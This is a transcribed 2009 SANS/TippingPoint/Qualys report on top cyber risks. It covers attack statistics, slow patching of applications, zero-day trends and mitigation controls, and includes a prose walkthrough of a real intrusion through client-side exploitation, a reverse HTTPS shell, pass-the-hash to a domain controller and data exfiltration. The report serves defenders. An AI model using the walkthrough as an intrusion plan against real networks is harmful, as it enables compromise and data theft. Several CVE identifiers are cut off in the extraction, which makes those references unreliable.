The Top Cyber Security Risks Two risks dwarf all others, but organizations fail to mitigate them
|
|
- Agatha Garrett
- 8 years ago
- Views:
Transcription
1 The Top Cyber Security Risks Two risks dwarf all others, but organizations fail to mitigate them Featuring attack data from TippingPoint intrusion prevention systems protecting 6,000 organizations, vulnerability data from 9,000,000 systems compiled by Qualys, and additional analysis and tutorial by the Internet Storm Center and key SANS faculty members. September 2009 Contents...1 Executive summary...2 Overview...4 Vulnerability exploitation trends...5 Application vulnerabilities exceed OS vulnerabilities...5 Web application attacks...5 Windows: Conficker/Downadup...6 Apple: QuickTime and six more...7 Origin and destination analysis for four key attacks...7 Application patching is much slower than operating system patching...14 Tutorial: Real-life HTTP client-side exploitation example...18 Step 0: Attacker places content on trusted site...18 Step 1: Client-side exploitation...19 Step 2: Establish reverse shell backdoor using HTTPS...19 Steps 3 and 4: Dump hashes and use pass-the-hash attack to pivot...20 Step 5: Pass the hash to compromise domain controller...20 Steps 6 and 7: Exfiltration...21 Zero-day vulnerability trends...21 Best practices in mitigation and control of the top risks...23 Critical Controls - As Applied to HTTP Server Threats
2 Executive Summary Priority One: Client-side software that remains unpatched. Waves of targeted attacks, often called spear phishing, are exploiting client-side vulnerabilities in commonly used programs such as Adobe PDF Reader, QuickTime, Adobe Flash and Microsoft Office. This is currently the primary initial infection vector used to compromise computers that have Internet access. Those same client-side vulnerabilities are exploited by attackers when users visit infected web sites. (See Priority Two below for how they compromise the web sites). Because the visitors feel safe downloading documents from the trusted sites, they are easily fooled into opening documents and music and video that exploit client-side vulnerabilities. Some exploits do not even require the user to open documents. Simply accessing an infected website is all that is needed to compromise the client software. The victims infected computers are then used to propagate the infection and compromise other internal computers and sensitive servers incorrectly thought to be protected from unauthorized access by external entities. In many cases, the ultimate goal of the attacker is to steal data from the target organizations and also to install back doors through which the attackers can return for further exploitation. On average, major organizations take at least twice as long to patch client-side vulnerabilities as they take to patch operating system vulnerabilities. In other words the highest priority risk is getting less attention than the lower priority risk. Priority Two: Internet-facing web sites that are vulnerable. Attacks against web applications constitute more than 60% of the total attack attempts observed on the Internet. These vulnerabilities are being exploited widely to convert trusted web sites into malicious websites serving content that contains client-side exploits. Web application vulnerabilities such as SQL injection and Cross-Site Scripting flaws in open-source as well as custom-built applications account for more than 80% of the vulnerabilities being discovered. Despite the enormous number of attacks and despite widespread publicity about these vulnerabilities, most web site owners fail to scan effectively for the common flaws and become unwitting tools used by criminals to infect the visitors that trusted those sites to provide a safe web experience. Operating systems continue to have fewer remotely-exploitable vulnerabilities that lead to massive Internet worms. Other than Conficker/Downadup, no new major worms for OSs were seen in the wild during the reporting period. Even so, the number of attacks against buffer overflow vulnerabilities in Windows tripled from May-June to July-August and constituted over 90% of attacks seen against the Windows operating system. 2
3 Rising numbers of zero-day vulnerabilities. World-wide there has been a significant increase over the past three years in the number of people discovering zero-day vulnerabilities, as measured by multiple independent teams discovering the same vulnerabilities at different times. Some vulnerabilities have remained unpatched for as long as two years. There is a corresponding shortage of highly skilled vulnerability researchers working for government and software vendors. So long as that shortage exists, the defenders will be at a significant disadvantage in protecting their systems against zero-day attacks. A large decline in the number of PHP File Include attacks appears to reflect improved processes used by application developers, system administrators, and other security professionals. 3
4 Overview Throughout the developed world, governments, defense organizations, and companies in finance, power, and telecommunications are increasingly targeted by overlapping surges of cyber attacks from criminals and nation-states seeking economic or military advantage. The number of attacks is now so large and their sophistication so great, that many organizations are having trouble determining which new threats and vulnerabilities pose the greatest risk and how resources should be allocated to ensure that the most probable and damaging attacks are dealt with first. Exacerbating the problem is that most organizations do not have an Internet-wide view of the attacks. This report uses current data covering March 2009 to August 2009 from appliances and software in thousands of targeted organizations to provide a reliable portrait of the attacks being launched and the vulnerabilities they exploit. The report s purpose is to document existing and emerging threats that pose significant risk to networks and the critical information that is generated, processed, transmitted, and stored on those networks. This report summarizes vulnerability and attack trends, focusing on those threats that have the greatest potential to negatively impact your network and your business. It identifies key elements that enable these threats and associates these key elements with security controls that can mitigate your risk. The report s target audience is major organizations that want to ensure their defenses are up-to-date and are tuned to respond to today s newest attacks and to the most pressing vulnerabilities. Data on actual attacks comes from intrusion prevention appliances deployed by TippingPoint that protect more than 6000 companies and government agencies. Data on vulnerabilities that remain unpatched comes from appliances and software deployed by Qualys that monitor vulnerabilities and configuration errors in more than 9,000,000 systems, scanned more than 100,000,000 times so far in The patterns in the data are vetted by the senior staff at the Internet Storm Center and by the faculty of the SANS Institute responsible for SANS programs in hacker exploits, penetration testing, and forensics. In other words, these findings reflect a fusion of data and experience never before brought together. The report also includes a pictorial description/tutorial on how some of the most damaging current attacks actually work. One of the most important findings in cybersecurity over the past several years has been the understanding most often asserted by White House officials that offense must inform defense. Only people who understand how attacks are carried out can be expected to be effective defenders. The tutorial shows what actually happened in a very damaging attack and is excerpted from Ed Skoudis SANS Hacker Exploits and Incident Handling class. It is included to boost defenders understanding of current attack techniques. 4
5 The report was compiled by Rohit Dhamankar, Mike Dausin, Marc Eisenbarth and James King of TippingPoint with assistance from Wolfgang Kandek of Qualys, Johannes Ullrich of the Internet Storm Center, and Ed Skoudis and Rob Lee of the SANS Institute faculty. Vulnerability Exploitation Trends Application Vulnerabilities Exceed OS Vulnerabilities During the last few years, the number of vulnerabilities being discovered in applications is far greater than the number of vulnerabilities discovered in operating systems. As a result, more exploitation attempts are recorded on application programs. The most popular applications for exploitation tend to change over time since the rationale for targeting a particular application often depends on factors like prevalence or the inability to effectively patch. Due to the current trend of converting trusted web sites into malicious servers, browsers and client-side applications that can be invoked by browsers seem to be consistently targeted. Figure 1: Number of Vulnerabilities in Network, OS and Applications Web Application Attacks There appear to be two main avenues for exploiting and compromising web servers: brute force password guessing attacks and web application attacks. Microsoft SQL, FTP, and SSH servers are popular targets for password guessing attacks because of the access that is gained if a valid username/password pair is identified. SQL Injection, Cross-site Scripting and PHP File Include attacks continue to be the three most popular techniques used for compromising web sites. Automated tools, designed to target custom web application vulnerabilities, make it easy to discover and infect several thousand web sites. 5
6 Windows: Conficker/Downadup Attacks on Microsoft Windows operating systems were dominated by Conficker/ Downadup worm variants. For the past six months, over 90% of the attacks recorded for Microsoft targeted the buffer overflow vulnerability described in the Microsoft Security Bulletin MS Although in much smaller proportion, Sasser and Blaster, the infamous worms from 2003 and 2004, continue to infect many networks. Figure 2: Attacks on Critical Microsoft Vulnerabilities (last 6 months) Figure 3: Attacks on Critical Microsoft Vulnerabilities (last 6 months) 6
7 Apple: QuickTime and Six More Apple has released patches for many vulnerabilities in QuickTime over the past year. QuickTime vulnerabilities account for most of the attacks that are being launched against Apple software. Note that QuickTime runs on both Mac and Windows Operating Systems. The following vulnerabilities should be patched for any QuickTime installations: CVE , CVE , CVE Figure 4: Attacks on Critical Apple Vulnerabilities (last 6 months) Origin and Destination Analysis for Four Key Attacks Over the past six months, we have seen some very interesting trends when comparing the country where various attacks originate to the country of the attack destination. In order to show these results, we have characterized and presented the data in relation to the most prevalent attack categories. The analysis performed for this report identified these attack categories as high-risk threats to most if not all networks, and as such, should be at the forefront of security practitioners minds. These categories are Server- Side HTTP attacks, Client-Side HTTP attacks, PHP Remote File Include, Cross-site Scripting attacks, and finally SQL Injection attacks. As you might expect, there is some overlap in these categories, with the latter three being subsets of the first two categories. However, the trends we see in separating this data is worth pointing out. The SQL Injection attacks that compose this category include SQL Injection using SELECT SQL Statement, SQL Injection Evasion using String Functions, and SQL Injection using Boolean Identity. The most prominent PHP Remote File Include attack is one that looks for a very small HTTP request that includes a link to another website as a parameter that contains a very specific evasion technique used by a number of attacks 7
8 to increase the reliability of their attacks. Also of note is a very specific attack against the Zeroboard PHP application, the only single application that made the top attacks. The final type of attack included in these statistics is one of the more popular HTTP Connect Tunnel attacks, which remains a staple in the Server-Side HTTP category. The HTTP connect tunnels are used for sending spam s via mis-configured HTTP servers. Looking at the breakdown by country we see that the United States is by far the major attack target for the Server-Side HTTP attack category (Figure 5). Figure 5: Server-Side HTTP Attacks by Destination Country (last 6 months) For years, attack targets in the United States have presented greater value propositions for attackers, so this statistic really comes as no surprise. An interesting spike in Server-Side HTTP attacks occurred in July This was entirely due to SQL Injection attacks using the SELECT command. Upon looking at the data, we saw a massive campaign by a range of IP addresses located at a very large Internet Server Provider (ISP). In this case, there were a number of machines located at a single collocation site that may have all been compromised with the same vulnerability due to the machines being at the same patch level. In addition, a number of gambling sites took part in this attack which peaked after hours on July Fourth, a major holiday in the United States. 8
9 Figure 6: Server-Side HTTP Attacks (last 6 months) Finally let s turn to the source of these HTTP Server-Side Attacks (Figure 7). Figure 7: Server-Side HTTP Attacks by Source Country (last 6 months) Here we see the United States as by far the largest origin, which is a pattern that has continued for some time. In many cases we believe these to be compromised machines that are then being used for further nefarious purposes. The next four offenders on the HTTP Server-Side attacking countries list are Thailand, Taiwan, China, and the Republic of Korea. They also show up in other portions of this report, so this graph will be a useful reference in comparing some of the other attack categories and their relative magnitude. 9
10 The last six months have seen a lot of activity with SQL injection attacks. Some typical patterns emerge with the United States being both the top source of and destination for SQL Injection events. SQL Injection on the internet can more or less be divided into two sub-categories: Legitimate SQL Injection and Malicious SQL Injection. Many web applications on the Internet still use SQL Injection for their normal functionality. It should be noted that this is only a difference in intent. The web applications that legitimately use SQL Injection are guaranteed to be vulnerable to the tools and techniques used by attackers to perform Malicious SQL Injections. The servers that house these applications may have a higher compromise rate not only because they are known to be vulnerable, but also because they need to distinguish between legitimate and malicious injects to identify attacks. Figure 8: SQL Injection Attacks by Destination Country (last 6 months) Looking at the magnitude of these attacks broken down by month (Figure 9), we see the large-scale SQL Injection campaign pointed out in the Server-Side HTTP Attack section. A very large spike in SQL Injection attacks in July was caused mostly by an online advertiser who distributed code to many affiliates using SQL injection as functionality. The application was quickly pulled, resulting in a large drop in events for the month of August. 10
11 Figure 9: SQL Injection Attacks (last 6 months) The source distribution of many of these attacks is much more diverse than the destination. China is now the single largest source outside of the United States. Again the overwhelming destination for these events is in the United States. (Figure 10). Figure 10: SQL Injection Attacks by Source Country (6 months) In conclusion, we cannot overstate the importance of protecting DMZ-based web applications from SQL Injection attacks. Increasingly, the ultimate objective of attackers is the acquisition of sensitive data. While the media may consistently report attacker targets as being credit cards and social security numbers, that is more due to the popular understanding of the marketability of this data. They are not the only valuable data types 11
12 that can be compromised. Since SQL Injection attacks offer such easy access to data, it should be assumed that any valuable data stored in a database accessed by a web server is being targeted. Although PHP File Include attacks have been popular, we have seen a notable decline in the overall number of attacks that have taken place. With the exception of a major attacks originating from Thailand in April, the number of PHP File Include attacks in August is less than half the March/May average. There are many ways to protect against these attacks. Apache configuration, input sanitization, and network security equipment are all very good at deterring these attacks, so it seems likely that the drop in total attacks is at least partly due to a positive response by application developers, system administrators, and security professionals. However, due to the extreme ease with which these attacks are carried out, and the enormous benefit of a successful attack (arbitrary PHP code is executed.), attacks such as these are likely to remain popular for some time. Figure 11: PHP Remote File Include Attacks (last 6 months) Let us look at the sources of PHP Remote File Include attacks. A major attack campaign was launched out of Thailand in April that caused Thailand to show up at number 1 in this list. 12
13 Figure 12: PHP Remote File Include Attacks by Source Country (6 months) Cross Site Scripting (XSS) is one of the most prevalent bugs in today s web applications. Unfortunately, developers often fall in the trap of introducing XSS bugs while creating custom code that connects all of the diverse web technologies that are so prevalent in today s Web 2.0 world. Another very common use of XSS is by various advertisers analytic systems. For example, an advertiser s banner might be embedded in a web page which is set up to reflect some JavaScript off of the advertiser s HTTP server for tracking purposes. However, in this case, there is little risk because the site in question (usually) has full control over his/her page, so this request to the advertiser is not generally malicious. It is the reflection attacks, along with attacks that leverage flaws in form data handling, that make up the vast majority of XSS attacks that we have seen in the last six months. Figure 13: XSS Attacks by Source Country (last 6 months) 13
14 Attacks sourced from the United States have been on a steady decline month-overmonth. The Republic of Korea has seen a 50% reduction in the last 30 days. These two events however have been offset by a sudden 20% increase in the last 30 days in attacks from Australia. The other three major players, namely, Hong Kong, China and Taiwan have remained stable over the past three month periods in this category. Application Patching is Much Slower than Operating System Patching Qualys scanners collect anonymized data of detected vulnerabilities to capture the changing dynamics in the vulnerability assessment field. The data documents changes such as the decline of server side vulnerabilities and the corresponding rise of vulnerabilities on the client side, both in operating system components and applications. A Top 30 ranking is used often to see if major changes occur in the most frequent vulnerabilities found. Here is the ranking for the first half of 2009 edited to remove irrelevant data points such as 0-day vulnerabilities. Description WordPad and Office Text Converters Remote Code Execution Vulnerability (MS09-010) Sun Java Multiple Vulnerabilities ( and others) Sun Java Web Start Multiple Vulnerabilities May Allow Elevation of Privileges(238905) Java Runtime Environment Virtual Machine May Allow Elevation of Privileges (238967) Adobe Acrobat and Adobe Reader Buffer Overflow (APSA09-01) Microsoft SMB Remote Code Execution Vulnerability (MS09-001) Sun Java Runtime Environment GIF Images Buffer Overflow Vulnerability Microsoft Excel Remote Code Execution Vulnerability (MS09-009) Adobe Flash Player Update Available to Address Security Vulnerabilities (APSB09-01) Sun Java JDK JRE Multiple Vulnerabilities (254569) Microsoft Windows Server Service Could Allow Remote Code Execution (MS08-067) Microsoft Office PowerPoint Could Allow Remote Code Execution (MS09-017) Microsoft XML Core Services Remote Code Execution Vulnerability (MS08-069) Microsoft Visual Basic Runtime Extended Files Remote Code Execution Vulnerability (MS08-070) Microsoft Excel Multiple Remote Code Execution Vulnerabilities (MS08-074) Vulnerabilities in Microsoft DirectShow Could Allow Remote Code Execution (MS09-028) Microsoft Word Multiple Remote Code Execution Vulnerabilities (MS08-072) Adobe Flash Player Multiple Vulnerabilities (APSB07-20) Adobe Flash Player Multiple Security Vulnerabilities (APSB08-20 ) Third Party CAPICOM.DLL Remote Code Execution Vulnerability Microsoft Windows Media Components Remote Code Execution Vulnerability (MS08-076) Adobe Flash Player Multiple Vulnerabilities (APSB07-12) Microsoft Office Remote Code Execution Vulnerability (MS08-055) 14
15 Description Adobe Reader JavaScript Methods Memory Corruption Vulnerability (APSA09-02 and APSB09-06) Microsoft PowerPoint Could Allow Remote Code Execution (MS08-051) Processing Font Vulnerability in JRE May Allow Elevation of Privileges(238666) Microsoft Office Could Allow Remote Code Execution (MS08-016) Adobe Acrobat/Reader util.printf() Buffer Overflow Vulnerability (APSB08-19) Adobe Acrobat and Adobe Reader Multiple Vulnerabilities (APSB08-15) Windows Schannel Security Package Could Allow Spoofing Vulnerability (MS09-007) Table 1: Qualys Top 30 in H Some of the vulnerabilities listed in the table get quickly addressed by IT administrators vulnerabilities in the base operating system class, for example, show a significant drop in even the first 15 days of their lifetime: Figure 14: Microsoft OS Vulnerabilities But at least half of the vulnerabilities in the list, primarily vulnerabilities found in applications receive less attention and get patched on a much slower timeline. Some of these applications, such as Microsoft Office and Adobe Reader are very widely installed and so expose the many systems they run on to long lived threats. The following graphs plot the number of vulnerabilities detected for Microsoft Office and Adobe Reader normalized to the maximum number of vulnerabilities detected in the timeframe. Periodic drops in detection rates occur during the weekends when scanning focuses on servers rather than desktop machines and the detection rates of vulnerabilities related to desktop software fall accordingly. 15
16 Figure 15: Microsoft PowerPoint and Adobe Vulnerabilities Patching Cycles Attackers have long picked up on this opportunity and have switched to different types of attacks in order to take advantage of these vulnerabilities, using social engineering techniques to lure end-users into opening documents received by or by infecting websites with links to documents that have attacks for these vulnerabilities embedded. These infected documents are not only placed on popular web sites that have a large number of visitors, but increasingly target the long-tail, the thousands of specialized websites that have smaller but very faithful audiences. By identifying and exploiting vulnerabilities in the Content Management Systems used by these sites, attackers can automate the infection process and reach thousands of sites in a matter of hours. Attacks 16
17 using PDF vulnerabilities have seen a large increase in late 2008 and 2009 as it became clear to attackers how easy it is to use this method of getting control over a machine. Adobe Flash has similar problems with the applications of its updates there are four Flash vulnerabilities in our Top 30 list that date back as far as 2007: Figure 16: Flash Vulnerabilities Flash presents additional challenges: it does not have its automatic update mechanism and one needs to patch Internet Explorer in a separate step from other browsers. For users that have more than one browser installed, it is quite easy to forget to completely close Flash vulnerabilities and continue to be unwillingly vulnerable. One of the other software families that is high on the Top 30 list is Java, which is widely installed for running Java applets in the common browsers and also increasingly for normal applications. It is quite slow in the patch cycle, with actually increasing numbers of total vulnerabilities as the introduction of new vulnerabilities outweighs the effect of patching. Java has the additional problem that until recently new versions did not uninstall the older code, but only pointed default execution paths to the new, fixed version; attack code could be engineered to take advantage of the well-known paths and continue to use older and vulnerable Java engines. 17
18 Figure 17: Sun Java Vulnerabilities Tutorial: Real Life HTTP Client-side Exploitation Example This section illustrates an example of a real life attack conducted against an organization that resulted in loss of critical data for the organization. In this attack, Acme Widgets Corporation suffered a major breach from attackers who were able to compromise their entire internal network infrastructure using two of the most powerful and common attack vectors today: Exploitation of client-side software and pass-the-hash attacks against Windows machines. Step 0: Attacker Places Content on Trusted Site In Step 0, the attacker begins by placing content on a trusted third-party website, such as a social networking, blogging, photo sharing, or video sharing website, or any other web server that hosts content posted by public users. The attacker s content includes exploitation code for unpatched client-side software. 18
19 Step 1: Client-Side Exploitation In Step 1, a user on the internal Acme Widgets enterprise network surfs the Internet from a Windows machine that is running an unpatched client-side program, such as a media player (e.g., Real Player, Windows Media Player, itunes, etc.), document display program (e.g., Acrobat Reader), or a component of an office suite (e.g., Microsoft Word, Excel, Powerpoint, etc.). Upon receiving the attacker s content from the site, the victim user s browser invokes the vulnerable client-side program passing it the attacker s exploit code. This exploit code allows the attacker to install or execute programs of the attacker s choosing on the victim machine, using the privileges of the user who ran the browser. The attack is partially mitigated because this victim user does not have administrator credentials on this system. Still, the attacker can run programs with those limited user privileges. Step 2: Establish Reverse Shell Backdoor Using HTTPS In Step 2, the attacker s exploit code installs a reverse shell backdoor program on the victim machine. This program gives the attacker command shell access of the victim machine, communicating between this system and the attacker using outbound HTTPS access from victim to attacker. The backdoor traffic therefore appears to be regular encrypted outbound web traffic as far as the enterprise firewall and network is concerned. 19
20 Steps 3 & 4: Dump Hashes and Use Pass-the-Hash Attack to Pivot In Step 3, the attacker uses shell access of the initial victim system to load a local privilege escalation exploit program onto the victim machine. This program allows the attacker to jump from the limited privilege user account to full system privileges on this machine. Although vendors frequently release patches to stop local privilege escalation attacks, many organizations do not deploy such patches quickly, because such enterprises tend to focus exclusively on patching remotely exploitable flaws. The attacker now dumps the password hashes for all accounts on this local machine, including a local administrator account on the system. In Step 4, instead of cracking the local administrator password, the attacker uses a Windows pass-the-hash program to authenticate to another Windows machine on the enterprise internal network, a fully patched client system on which this same victim user has full administrative privileges. Using NTLMv1 or NTLMv2, Windows machines authenticate network access for the Server Message Block (SMB) protocol based on user hashes and not the passwords themselves, allowing the attacker to get access to the file system or run programs on the fully patched system with local administrator privileges. Using these privileges, the attacker now dumps the password hashes for all local accounts on this fully patched Windows machine. Step 5: Pass the Hash to Compromise Domain Controller In Step 5, the attacker uses a password hash from a local account on the fully patched Windows client to access the domain controller system, again using a pass-the-hash attack to gain shell access on the domain controller. Because the password for the local administrator account is identical to the password for a domain administrator account, the password hashes for the two accounts are identical. Therefore, the attacker can access the domain controller with full domain administrator privileges, giving the attacker complete control over all other accounts and machines in that domain. 20
21 Steps 6 and 7: Exfiltration In Step 6, with full domain administrator privileges, the attacker now compromises a server machine that stores secrets for the organization. In Step 7, the attacker exfiltrates this sensitive information, consisting of over 200 Megabytes of data. The attacker pushes this data out to the Internet from the server, again using HTTPS to encrypt the information, minimizing the chance of it being detected. Zero-Day Vulnerability Trends A zero-day vulnerability occurs when a flaw in software code is discovered and code exploiting the flaw appears before a fix or patch is available. Once a working exploit of the vulnerability has been released into the wild, users of the affected software will continue to be compromised until a software patch is available or some form of mitigation is taken by the user. The File Format Vulnerabilities continue to be the first choice for attackers to conduct zero-day and targeted attacks. Most of the attacks continue to target Adobe PDF, Flash Player and Microsoft Office Suite (PowerPoint, Excel and Word) software. Multiple publicly available fuzzing frameworks make it easier to find these flaws. The vulnerabilities are often found in 3rd party add-ons to these popular and wide-spread software suites, making the patching process more complex and increasing their potential value to attackers. The notable zero-day vulnerabilities during past 6 months were: Adobe Acrobat, Reader, and Flash Player Remote Code Execution Vulnerability (CVE ) 21
22 Microsoft Office Web Components ActiveX Control Code Execution Vulnerability (CVE ) Microsoft Active Template Library Header Data Remote Code Execution Vulnerability (CVE ) Microsoft DirectX DirectShow QuickTime Video Remote Code Execution Vulnerability (CVE ) Adobe Reader Remote Code Execution Vulnerability (CVE ) Microsoft PowerPoint Remote Code Execution Vulnerability (CVE ) The ease of finding zero-day vulnerabilities is a direct result of an overall increase in the number of people having skills to discover vulnerabilities world-wide. This is evidenced by the fact that TippingPoint DVLabs often receives the same vulnerabilities from multiple sources. For example, MS (Microsoft Internet Explorer DOM Object Heap Overflow Vulnerability) was discovered independently by three researchers. The first researcher submitted remote IE 6/7 critical vulnerability on Oct 22, A second independent researcher submitted the same vulnerability on April 23, A third independent researcher submitted the same vulnerability on May 19, All three submissions outlined different approaches of auditing and finding the same vulnerability. The implication of increasing duplicate discoveries is fairly alarming, in that the main mitigation for vulnerabilities of this type is patching, which is an invalid strategy for protecting against zero-day exploits. There is a heightened risk from cyber criminals, who can discover zero-day vulnerabilities and exploit them for profit. Add to this that software vendors have not necessarily lowered their average time for patching vulnerabilities reported to them, and that TippingPoint is aware of a number of vulnerabilities that were reported to vendors two years ago and are still awaiting a patch. This makes zero-day exploits in client-side applications one of the most significant threats to your network, and requires that you put in place additional information security measures and controls to complement your vulnerability assessment and remediation activities. 22
23 Best Practices in Mitigation and Control of the Top Risks A few weeks ago, the Center for Strategic and International Studies published an updated version of the Twenty Critical Controls for Effective Cyber Defense. CAG.pdf These controls reflect the consensus of many of the nation s top cyber defenders and attackers on which specific controls must be implemented first to mitigate known cyber threats. One of the most valuable uses of this report is to help organizations deploying the Twenty Critical Security Controls to be certain that no critical new attacks have been found that would force substantial changes in the Twenty Controls and at the same time to help people who are implementing the Twenty Critical Security Controls to focus their attention on the elements of the controls that need to be completed most immediately. The Key Elements of these attacks and associated Controls: User applications have vulnerabilities that can be exploited remotely, Controls 2 (Inventory of Software), 3 (Secure Configurations), and 10 (Vulnerability Assessment and Remediation) can ensure that vulnerable software is accounted for, identified for defensive planning, and remediated in a timely manner. Control 5 (Boundary Defenses) can provide some prevention/detection capability when attacks are launched. There is an increasing number of zero-days in these types of applications, Control 12 (Malware Defenses) is the most effective at mitigating many of these attacks because it can ensure that malware entering the network is effectively contained. Controls 2, 3, and 10 have minimal impact on zero-day exploits and Control 5 can provide some prevention/detection capabilities against zero-days as well as known exploits. Successful exploitation grants the attacker the same privileges on the network as the user and/or host that is compromised, Control 5 (Boundary Defenses) can ensure that compromised host systems (portable and static) can be contained. Controls 8 (Controlled Use of Administrative Privileges) 23
24 and 9 (Controlled Access) limit what access the attacker has inside the enterprise once they have successfully exploited a user application. The attacker is masquerading as a legitimate user but is often performing actions that are not typical for that user. Controls 6 (Audit Logs) and 11 (Account Monitoring and Control) can help identify potentially malicious or suspicious behavior and Control 18 (Incident Response Capability) can assist in both detection and recovery from a compromise. Critical Controls - As Applied to HTTP Server Threats As discussed previously, web application vulnerabilities and server-side HTTP threats pose a serious threat not only to the web servers you control, but also the servers that your users visit in day-to-day activities. Trends have indicated that SQL injection attacks are rising rapidly. SQL injection attacks are only valid if an application is written in such a way as to allow them; vulnerability is not a matter of configuration or (usually) access control. The Key Elements of these attacks and associated Controls: Web applications have vulnerabilities that can be easily discovered and exploited remotely include the following: Control 7 (Application Software Security) is perhaps the most critical control regarding these types of attacks. Application developers should ensure that all input received from remote sources is sanitized of data meaningful to backend database systems. Control 5 (Boundary Defenses) can ensure that the appropriate layered protections are in place to prevent/detect attacks aimed at your web servers. Controls 2 (Inventory of Software), 3 (Secure Configurations), and 10 (Vulnerability Assessment and Remediation) can ensure that vulnerable applications are accounted for, identified for defensive planning, and remediated in a timely manner. Successful exploitation grants the attacker the ability to put malicious code on the server and attempt to compromise all clients that browse that server. Control 6 (Audit Logs) can assist in identifying when someone has compromised your web server. Control 18 (Incident Response Capability) can help mitigate the impact of, and assist in recovery from, attacks against vulnerable applications. Corporate Headquarters: 7501B North Capital of Texas Hwy. Austin, Texas USA TRUE IPS 6 European Headquarters: Herengracht 466, 2nd Floor 1017 CA Amsterdam The Netherlands Asia Pacific Headquarters: 47 Scotts Road #11-03 Goldbell Towers Singapore Copyright 3Com Corporation. TippingPoint and Digital Vaccine are registered trademarks of 3Com Corporation or its subsidiaries. All other company and product names may be trademarks of their respective holders. While every effort is made to ensure the information given is accurate, 3Com does not accept liability for any errors which may arise. Specifications and other information in this document may be subject to change without notice. XXXXXX-XX 9/
Priority One: Client-side software that remains unpatched. Priority Two: Internet-facing web sites that are vulnerable.
SANS: - http://www.sans.org/top-cyber-security-risks/summary.php 2 of 3 5/6/2553 12:20 Priority One: Client-side software that remains unpatched. Waves of targeted email attacks, often called spear phishing,
More informationProtecting Your Organisation from Targeted Cyber Intrusion
Protecting Your Organisation from Targeted Cyber Intrusion How the 35 mitigations against targeted cyber intrusion published by Defence Signals Directorate can be implemented on the Microsoft technology
More informationDesktop Security. Overview and Technology Guidance. Michael Ramsey Network Specialist, NC DPI
Desktop Security Overview and Technology Guidance Michael Ramsey Network Specialist, NC DPI Desktop Security Best practices for both the technical type and the typical user Defensive Layering Top Vulnerabilities
More informationThe Importance of Patching Non-Microsoft Applications
The Importance of Patching Non-Microsoft Applications Technical WHITE PAPER The Importance of Patching Non-Microsoft Applications In the past, organizations patched only Microsoft operating systems. As
More informationHow Web Application Security Can Prevent Malicious Attacks
Securing Enterprise Web Applications for Critical Data Protection and PCI-DSS Compliance Selecting the Right Technology is Essential in Guarding Against Malicious Attacks White_Paper As today s organizations
More informationThe Importance of Patching Non-Microsoft Applications
The Importance of Patching Non-Microsoft Applications Technical WHITE PAPER The Importance of Patching Non-Microsoft Applications In the past, organizations patched only Microsoft operating systems. As
More informationSecurity Threat Kill Chain What log data would you need to identify an APT and perform forensic analysis?
Security Threat Kill Chain What log data would you need to identify an APT and perform forensic analysis? This paper presents a scenario in which an attacker attempts to hack into the internal network
More informationThe Importance of Patching Non-Microsoft Applications
The Importance of Patching Non-Microsoft Applications Technical WHITE PAPER The Importance of Patching Non-Microsoft Applications In the past, organizations patched only Microsoft operating systems. As
More informationWhat is Web Security? Motivation
brucker@inf.ethz.ch http://www.brucker.ch/ Information Security ETH Zürich Zürich, Switzerland Information Security Fundamentals March 23, 2004 The End Users View The Server Providers View What is Web
More informationWhere every interaction matters.
Where every interaction matters. Peer 1 Vigilant Web Application Firewall Powered by Alert Logic The Open Web Application Security Project (OWASP) Top Ten Web Security Risks and Countermeasures White Paper
More informationPenetration Testing Report Client: Business Solutions June 15 th 2015
Penetration Testing Report Client: Business Solutions June 15 th 2015 Acumen Innovations 80 S.W 8 th St Suite 2000 Miami, FL 33130 United States of America Tel: 1-888-995-7803 Email: info@acumen-innovations.com
More informationModern Cyber Threats. how yesterday s mind set gets in the way of securing tomorrow s critical infrastructure. Axel Wirth
Modern Cyber Threats how yesterday s mind set gets in the way of securing tomorrow s critical infrastructure Axel Wirth Healthcare Solutions Architect Distinguished Systems Engineer AAMI 2013 Conference
More informationINDUSTRIAL CONTROL SYSTEMS CYBER SECURITY DEMONSTRATION
INDUSTRIAL CONTROL SYSTEMS CYBER SECURITY DEMONSTRATION Prepared for the NRC Fuel Cycle Cyber Security Threat Conference Presented by: Jon Chugg, Ken Rohde Organization(s): INL Date: May 30, 2013 Disclaimer
More informationBasic Security Considerations for Email and Web Browsing
Basic Security Considerations for Email and Web Browsing There has been a significant increase in spear phishing and other such social engineering attacks via email in the last quarter of 2015, with notable
More informationWHITE PAPER. FortiWeb and the OWASP Top 10 Mitigating the most dangerous application security threats
WHITE PAPER FortiWeb and the OWASP Top 10 PAGE 2 Introduction The Open Web Application Security project (OWASP) Top Ten provides a powerful awareness document for web application security. The OWASP Top
More informationHow We're Getting Creamed
ed Attacks How We're Getting Creamed By Ed Skoudis June 9, 2011 ed Attacks - 2011 Ed Skoudis 1 $ cut -f5 -d: /etc/passwd grep -i skoudis Ed Skoudis Started infosec career at Bellcore in 1996 working for
More information3. Broken Account and Session Management. 4. Cross-Site Scripting (XSS) Flaws. Web browsers execute code sent from websites. Account Management
What is an? s Ten Most Critical Web Application Security Vulnerabilities Anthony LAI, CISSP, CISA Chapter Leader (Hong Kong) anthonylai@owasp.org Open Web Application Security Project http://www.owasp.org
More informationWhat Do You Mean My Cloud Data Isn t Secure?
Kaseya White Paper What Do You Mean My Cloud Data Isn t Secure? Understanding Your Level of Data Protection www.kaseya.com As today s businesses transition more critical applications to the cloud, there
More informationRecommended Practice Case Study: Cross-Site Scripting. February 2007
Recommended Practice Case Study: Cross-Site Scripting February 2007 iii ACKNOWLEDGEMENT This document was developed for the U.S. Department of Homeland Security to provide guidance for control system cyber
More informationQUARTERLY REPORT 2015 INFOBLOX DNS THREAT INDEX POWERED BY
QUARTERLY REPORT 2015 INFOBLOX DNS THREAT INDEX POWERED BY EXPLOIT KITS UP 75 PERCENT The Infoblox DNS Threat Index, powered by IID, stood at 122 in the third quarter of 2015, with exploit kits up 75 percent
More informationWEB SECURITY. Oriana Kondakciu 0054118 Software Engineering 4C03 Project
WEB SECURITY Oriana Kondakciu 0054118 Software Engineering 4C03 Project The Internet is a collection of networks, in which the web servers construct autonomous systems. The data routing infrastructure
More informationBefore the DEPARTMENT OF COMMERCE Internet Policy Task Force
Before the DEPARTMENT OF COMMERCE Internet Policy Task Force In the Matter of Cybersecurity, Innovation Docket No. 100721305-0305-01 and the Internet Economy COMMENTS OF VeriSign, Inc Joe Waldron Director,
More informationIntegrated Network Vulnerability Scanning & Penetration Testing SAINTcorporation.com
SAINT Integrated Network Vulnerability Scanning and Penetration Testing www.saintcorporation.com Introduction While network vulnerability scanning is an important tool in proactive network security, penetration
